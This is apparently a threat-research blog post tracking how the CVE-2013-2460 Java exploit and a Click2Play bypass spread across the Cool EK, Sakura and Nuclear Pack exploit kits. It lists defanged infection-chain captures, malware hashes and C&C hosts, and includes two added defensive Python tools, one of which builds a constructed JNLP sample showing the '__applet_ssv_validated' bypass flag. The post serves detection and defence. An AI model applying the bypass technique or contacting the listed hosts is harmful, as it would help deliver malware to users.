A new variant of a "Kore-ish" Cool EK appeared a few days ago.
Yes, it's difficult to follow the fast-moving EK landscape. No payload in the jar for that one.
Image: Some instances of this "Cool EK" in URLQuery
It is also used to spread the Urausy ransomware and FakeAV (so... BestAV stuff).
All jars found there were identical to those in Blackhole. Until today.
CVE-2013-2460 + Click2Play bypass:
That CVE was already in use in Private Exploit Pack, but it was noisy (Imposition then made it optional).
Image: CVE-2013-2460 successful path in Cool EK (Kore-ish) with Click2Play bypass, 2013-09-20
GET http://[redacted].tacogratis .com/index.php?p=5267
200 OK (text/html)
Image: Key piece of the landing
GET http://[redacted].tacogratis .com/index.php?p=5290
200 OK (text/javascript)
GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30
200 OK (application/java-archive)
GET http://[redacted].tacogratis .com/index.php?p=5268
200 OK (application/java-archive)
GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14
200 OK (application/x-msdownload) 170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)
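The captures in this post all have the same shape: a landing page (text/html), a script, a jar fetched twice, then a binary. That sequence is the signal to look for in proxy logs when you want to know whether a visit actually turned into an exploit and a drop. The parser below, an added example and not code from this post or from any of the kits, reads that "GET url [md5]" / "200 OK (type) [md5] [note]" listing format, refangs the deliberately broken hostnames, labels each hop by content type, flags the jar-then-binary transition and collects hosts and hashes as IOCs. The sample input is the Cool EK chain from just above, copied verbatim; the stage names and the chain heuristic are my own.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

# Constructed sample: the Cool EK (Kore-ish) chain listed in the post, as a
# "GET url [md5]" / "200 OK (content-type) [md5] [note]" listing. Hosts are
# defanged with a space ("tacogratis .com") exactly as in the post.
SAMPLE_TRACE = """\
GET http://[redacted].tacogratis .com/index.php?p=5267
200 OK (text/html)
GET http://[redacted].tacogratis .com/index.php?p=5290
200 OK (text/javascript)
GET http://[redacted].tacogratis .com/index.php?p=5268 fb1decbef1c4361eb421a3496201ef30
200 OK (application/java-archive)
GET http://[redacted].tacogratis .com/index.php?p=5268
200 OK (application/java-archive)
GET http://cghtuj.tacogratis .com/index.php?p=5275&e=14
200 OK (application/x-msdownload) 170896de44d75651bbbd9358b0f11c34 (Urausy Ransomware)
"""

MD5_RE = re.compile(r"\b[0-9a-f]{32}\b")
RESP_RE = re.compile(r"^(?P<status>\d{3})\s+\S+\s+\((?P<ctype>[^)]+)\)(?P<rest>.*)$")

# My own labels for the content types seen in these captures (assumption, not a standard).
STAGE_BY_TYPE = {
    "text/html": "landing",
    "text/javascript": "script",
    "application/java-archive": "jar",
    "application/java": "jar",
    "application/x-msdownload": "payload",
    "application/octet-stream": "payload",
}


@dataclass
class Hop:
    method: str
    url: str
    host: str
    status: str
    content_type: str
    stage: str
    md5: Optional[str]
    note: str


def refang(spaced_url: str) -> str:
    """Undo the 'host .tld' defanging by dropping the inserted spaces."""
    return spaced_url.replace(" ", "")


def parse_trace(text: str) -> List[Hop]:
    """Pair each request line with the response line that follows it."""
    hops: List[Hop] = []
    pending: Optional[Tuple[str, str, Optional[str]]] = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        parts = line.split()
        if parts[0] in ("GET", "POST"):
            md5 = parts.pop() if len(parts) > 1 and MD5_RE.fullmatch(parts[-1]) else None
            pending = (parts[0], refang(" ".join(parts[1:])), md5)
            continue
        m = RESP_RE.match(line)
        if not (m and pending):
            continue  # orphan response line (the post has one); nothing to attach it to
        method, url, md5 = pending
        rest = m.group("rest").strip()
        md5 = md5 or next(iter(MD5_RE.findall(rest)), None)  # hash may sit on either line
        ctype = m.group("ctype").strip()
        host = url.split("://", 1)[-1].split("/", 1)[0].split(":")[0]  # drop port
        hops.append(Hop(method, url, host, m.group("status"), ctype,
                        STAGE_BY_TYPE.get(ctype, "other"), md5, MD5_RE.sub("", rest).strip()))
        pending = None
    return hops


def find_exploit_chain(hops: List[Hop]) -> Optional[Tuple[int, int]]:
    """Index of the last jar before the first binary that follows it, or None.
    A jar followed by an exe/octet-stream from the same capture is the EK 'hit' shape."""
    last_jar = None
    for i, h in enumerate(hops):
        if h.stage == "jar":
            last_jar = i
        elif h.stage == "payload" and last_jar is not None:
            return (last_jar, i)
    return None


def iocs(hops: List[Hop]) -> Dict[str, List[str]]:
    return {"hosts": sorted({h.host for h in hops}),
            "md5": sorted({h.md5 for h in hops if h.md5})}


if __name__ == "__main__":
    chain = parse_trace(SAMPLE_TRACE)
    for i, h in enumerate(chain):
        print(f"{i}: {h.stage:8} {h.content_type:28} {h.host} {h.md5 or ''} {h.note}")
    print("exploit chain:", find_exploit_chain(chain))
    print("iocs:", iocs(chain))
```

The same parser reads the Sakura and Nuclear listings further down (their "Decoded : <md5>" notes are picked up from the response line), so one run over all three captures gives you the full IOC set of this post.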
----- Off Topic ----
Payload is rotating fast (2 more md5) :
b56348220f83ad9db50cb5beb564148b
64ef8f2cb215af4b2fbcb51cadfcc025
Image: Urausy ransomware, DE design, 2013-09-20 (BestAV soft 2)
Note: on another thread you can get a FakeAV.
Image: Payload call with bigger charge
9d8d3094849f685859945140721aafb1
7fb9423c4bdf7080137745e81ba38362
13e24b552ea472146495ac8a33cca975
Image: Other payload from this "Kore-ish" Cool EK (BestAV soft 1)
So what's that Click2Play bypass?
Quite surely: http://seclists.org/bugtraq/2013/Jul/41
2013-06-18 - Vulnerability fixed in Java 7u25
Yes:
Image: Warning with jre7u25 (and as CVE-2013-2460 is patched too, clicking Run there won't put you at risk)
5 days ago:
EKs vs jre7u21: http://t.co/jCkdtnp7NW
— kafeine (@kafeine) September 15, 2013
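The "Jnlp call" captures further down are what that bypass looks like on the wire. As I recall the Bugtraq disclosure linked above (this is from memory, not from this post), the applet is launched through a JNLP description carried in the page itself (a `jnlp_href` or base64 `jnlp_embedded` param) whose applet-desc sets `__applet_ssv_validated=true`, which pre-7u25 Java treated as "the security prompt was already shown". The scanner below is an added example, not code from this post or from any kit: it pulls the embedded JNLP out of a landing page, decodes it and reports whether it carries that flag and which jar it points at. The landing-page fragment and JNLP are constructed for the example; the parameter names are my assumption about the technique.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import Dict, List, Tuple

# Assumed parameter name from the Java 7u21 Click2Play bypass disclosure (memory, not this post).
SSV_PARAM = "__applet_ssv_validated"

# Constructed JNLP (not from any kit): an applet-desc that pre-validates itself and
# points at a jar path shaped like the Cool EK one above.
SAMPLE_JNLP = """<jnlp spec="1.0" href="">
  <information><title>x</title><vendor>x</vendor></information>
  <resources>
    <j2se version="1.7*"/>
    <jar href="index.php?p=5268" main="true"/>
  </resources>
  <applet-desc name="x" main-class="hw" width="1" height="1">
    <param name="__applet_ssv_validated" value="true"/>
  </applet-desc>
</jnlp>"""

# Constructed landing-page fragment embedding that JNLP as base64.
SAMPLE_HTML = (
    '<applet code="hw.class" archive="index.php?p=5268" width="1" height="1">'
    '<param name="jnlp_embedded" value="%s"/></applet>'
    % base64.b64encode(SAMPLE_JNLP.encode()).decode()
)

PARAM_RE = re.compile(
    r'<param\b[^>]*?\bname\s*=\s*["\']?(?P<name>[^"\'\s>]+)["\']?[^>]*?'
    r'\bvalue\s*=\s*["\'](?P<value>[^"\']*)["\']',
    re.IGNORECASE | re.DOTALL,
)


def html_params(html: str) -> List[Tuple[str, str]]:
    """All <param name=... value=...> pairs, names lower-cased."""
    return [(m.group("name").lower(), m.group("value")) for m in PARAM_RE.finditer(html)]


def inspect_jnlp(xml_text: str) -> Dict:
    """Jar hrefs and whether any <param> claims the security prompt was already passed."""
    root = ET.fromstring(xml_text)
    jars = [j.get("href") for j in root.iter("jar") if j.get("href")]
    ssv = any(p.get("name", "").lower() == SSV_PARAM and p.get("value", "").lower() == "true"
              for p in root.iter("param"))
    return {"jars": jars, "ssv_validated": ssv}


def scan_landing(html: str) -> List[Dict]:
    """Findings for every JNLP hand-off or direct ssv flag found in the page."""
    findings: List[Dict] = []
    for name, value in html_params(html):
        if name == "jnlp_embedded":
            try:
                info = inspect_jnlp(base64.b64decode(value).decode("utf-8", "replace"))
            except (ValueError, ET.ParseError):
                continue  # garbage base64 or not XML: not a usable JNLP
            findings.append({"source": "jnlp_embedded", **info})
        elif name == "jnlp_href":
            # Remote JNLP: cannot be inspected offline, but the hand-off itself is worth a look.
            findings.append({"source": "jnlp_href", "href": value, "jars": [], "ssv_validated": None})
        elif name == SSV_PARAM and value.lower() == "true":
            findings.append({"source": "applet-param", "jars": [], "ssv_validated": True})
    return findings


if __name__ == "__main__":
    for f in scan_landing(SAMPLE_HTML):
        print(f)
```

On a real capture run this over the deobfuscated landing (the kits unpack the applet tag from JavaScript, so the raw HTML usually shows nothing), and treat `ssv_validated: True` as a signature of the bypass rather than proof of success: on 7u25 and later the flag is ignored and the prompt still appears, as the jre7u25 warning above shows.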
Who sold it ?
??
No download link for now. Yes, it will spread fast anyway.
It's easy to get rid of all these exploit kits: update!
<edit1 2013-09-21>
Already in Sakura... surely because of that blog post. It's often difficult to decide how much you can write about something.
Sakura CVE-2013-2460 & Click2Play bypass:
Image: Sakura featuring CVE-2013-2460 & Click2Play bypass, 2013-09-21
GET http://[redacted]253 .pw:8509/me.php
200 OK (text/html)
Image: Precision Strike, new Click2Play bypass for the u21 version
Image: Jnlp call
GET http://[redacted] .pw:8509/[redacted].ee
200 OK (application/java-archive) dca89d839abbb8f621a87de94d20d8f2 CVE-2013-2460
Image: Piece of CVE-2013-2460 in Sakura jar, 2013-09-21
200 OK (application/java-archive)
GET http://[redacted] .pw:8509/2889.ld
200 OK (application/octet-stream) Once decoded: 5fba8226303967ccfd27ea8710a8b99d (I think it's a Smokebot)
----- Off Topic ----
C&C Calls :
mexstat757.com POST /satep757/index.php
mexstat220.pw GET /setex/sev57.exe
mexstat220.pw GET /setex/sev57.exe
mexstat220.pw GET /setex/pm555.exe
etc...
46.165.201.27
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH
46.165.201.27
16265 | 46.165.192.0/18 | LEASEWEB | DE | LEASEWEB.COM | LEASEWEB GERMANY GMBH
It's the same guys as those who were behind this one-year-old post:
Since then, Smoke Bot has started encrypting its network calls.
----------------------
<edit2: 2013-09-23>
Nuclear Pack: CVE-2013-2460 + Click2Play bypass
Announced underground:
"добавлен новы exploit, пробив увеличен. работает тихо и не палится" Nuclear
which means something like:
"New exploit added, hit rate increased. Works quietly and doesn't get detected."
Image: CVE-2013-2460 with no security prompt, successful path in Nuclear Pack, 2013-09-23
GET http://[redacted].flogdoyfohoqobl .biz:12421/3dfa4ffa555573ba6fbb54a243289806/4/5b1bb46b5a96bee3ebbb1d2251d968bb.html
200 OK (text/html)
Image: Precision Strike (thanks @EKWatcher)
Image: jnlp call in Nuclear Pack after deobfuscation (thanks @EKWatcher)
GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java)
GET http://[redacted].flogdoyfohoqobl .biz:12421/b26c7ee3934bb471d1e1a7e4072dc6ef/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06.jar
200 OK (application/java) e03455403f226b23be42b30733a26101
Image: Piece of CVE-2013-2460 in Nuclear Pack, 2013-09-23
200 OK (application/octet-stream) Decoded: 3a9d1dcad1176717711eb92b25f7d6b0
GET http://[redacted].flogdoyfohoqobl .biz:12421/f/1379924555/ba365f21b8ebcfe78ba8a843b76c2d06/b26c7ee3934bb471d1e1a7e4072dc6ef/2/2
200 OK (application/octet-stream)
----------- Off Topic -----------
C&C:
185.6.80.125 - 61422 | 185.6.80.0/24 | TD-VITA | RU | - | TD-VITA LLC.
for instance :
POST /mBj7
Analysis by Joe Sandbox Cloud
------------------------------------
</edit2>